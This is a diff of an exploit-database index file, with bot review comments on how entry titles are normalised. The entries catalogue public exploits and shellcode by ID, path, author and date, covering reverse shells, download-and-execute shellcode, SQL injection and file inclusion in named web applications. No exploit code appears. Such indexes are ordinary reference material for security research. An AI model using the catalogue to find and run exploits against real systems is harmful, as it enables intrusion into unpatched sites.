@ -15730,6 +15739,7 @@ id,file,description,date,author,platform,type,port
40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -15976,7 +15986,7 @@ id,file,description,date,author,platform,type,port
1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0
1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0
1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0
1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0
1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0
1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0
1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0
1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0
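Review bot: the quoted-parameter style applied to 1510 ("'csscontent' Parameter Remote Code Execution") is not applied to the surrounding lines: 1503 "(cfgIncludeDirectory)", 1508 "(referer)" and 1513 "(tid)" keep the old parenthesised form, and 1511 "Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit" keeps the "Exploit" suffix that this pass removes elsewhere (see 5814). Either fix the whole neighbourhood in one go or note that the normalisation is intentionally incremental.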
@ -16295,7 +16305,7 @@ id,file,description,date,author,platform,type,port
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0
2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2022,platforms/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
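Review bot: 2022 is renamed from the component slug "com_extcalendar" to the product name "ExtCalendar", but the slug is what appears in request paths and in other advisories, so dropping it hurts searchability; consider keeping both, e.g. "Mambo Component ExtCalendar (com_extcalendar) 2.0 - Remote File Inclusion". The same hunk still shows 2020 "com_videodb" and 2023 "com_loudmouth" in slug form, so the file is left inconsistent either way.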
@ -16434,7 +16444,7 @@ id,file,description,date,author,platform,type,port
2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0
2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
2225,platforms/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0
2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0
2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0
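Review bot: 2225 keeps the bare label "File Inclusion" after the rename while 2222 and 2224 directly above say "Remote File Inclusion"; since the line is being touched anyway, state whether bigAPE-Backup 1.1 is a local or remote inclusion (the platform/type columns do not distinguish them). The same ambiguity applies to the untouched 2226 "NES Game and NES System c108122 - File Inclusion" in the context below.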
@ -17071,7 +17081,7 @@ id,file,description,date,author,platform,type,port
3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0
3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0
3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0
3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0
3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0
3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0
3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0
3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0
@ -17354,7 +17364,7 @@ id,file,description,date,author,platform,type,port
3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0
3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0
3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0
3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0
@ -17445,7 +17455,7 @@ id,file,description,date,author,platform,type,port
3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0
3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0
3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0
3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0
3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0
3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0
@ -17469,7 +17479,7 @@ id,file,description,date,author,platform,type,port
3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0
3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0
3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0
3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0
3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0
@ -17775,7 +17785,7 @@ id,file,description,date,author,platform,type,port
4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0
4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0
4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0
4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0
4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0
4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0
4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
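Review bot: The second 4264 line introduces the version "2.16.11", which the old description did not carry, and drops the script name `Details.cfm`; confirm the version against 4264.txt before committing it, since a wrong version in the description misleads anyone matching the entry against an installed product.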
@ -18051,7 +18061,7 @@ id,file,description,date,author,platform,type,port
4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0
4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0
4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0
4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0
4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0
4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0
@ -18091,7 +18101,7 @@ id,file,description,date,author,platform,type,port
4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0
4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0
4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0
4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0
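Review bot: The second 4758 line drops the parameter name `list` instead of promoting it the way the rest of this patch does ("'x' Parameter ..."); suggest "xeCMS 1.x - 'list' Parameter Remote File Disclosure" so the affected parameter stays searchable.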
@ -18372,7 +18382,7 @@ id,file,description,date,author,platform,type,port
5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0
5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0
5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection",2008-02-18,"it's my",php,webapps,0
5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0
5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
@ -18465,7 +18475,7 @@ id,file,description,date,author,platform,type,port
5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0
5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0
5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0
5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0
5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0
5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0
5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
@ -18875,35 +18885,35 @@ id,file,description,date,author,platform,type,port
5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0
5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0
5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0
5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0
5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0
5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Parameter Blind SQL Injection",2008-06-11,anonymous,php,webapps,0
5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0
5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0
5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0
5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0
5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0
5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0
5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0
5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0
5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0
5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0
5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0
5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion",2008-06-13,Loader007,php,webapps,0
5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' Parameter SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' Parameter SQL Injection",2008-06-13,K-159,php,webapps,0
5804,platforms/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Parameter Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0
5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0
5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0
5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0
5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0
5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0
5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' Parameter SQL Injection",2008-06-14,anonymous,php,webapps,0
5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Parameter Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
5816,platforms/php/webapps/5816.pl,"DIY - 'did' Parameter Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0
5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0
5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (POST) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0
5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps,0
5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0
5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0
5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0
5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0
5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0
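Review bot: The second 5820 line turns "(POST)" into "'POST' Parameter SQL Injection", but POST is the HTTP method, not a parameter name, so the new description is misleading; suggest "PHPEasyNews 1.13 RC2 - SQL Injection (POST)" or take the real parameter name from 5820.txt. In the same hunk the second 5812 line adds the version "1.3" that the old description lacked; that should be checked against 5812.txt as well.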
@ -18950,7 +18960,7 @@ id,file,description,date,author,platform,type,port
5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0
5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0
5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0
5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0
5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0
5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0
@ -19008,7 +19018,7 @@ id,file,description,date,author,platform,type,port
5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0
5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0
5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0
5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0
@ -19047,7 +19057,7 @@ id,file,description,date,author,platform,type,port
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
@ -19316,7 +19326,7 @@ id,file,description,date,author,platform,type,port
6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0
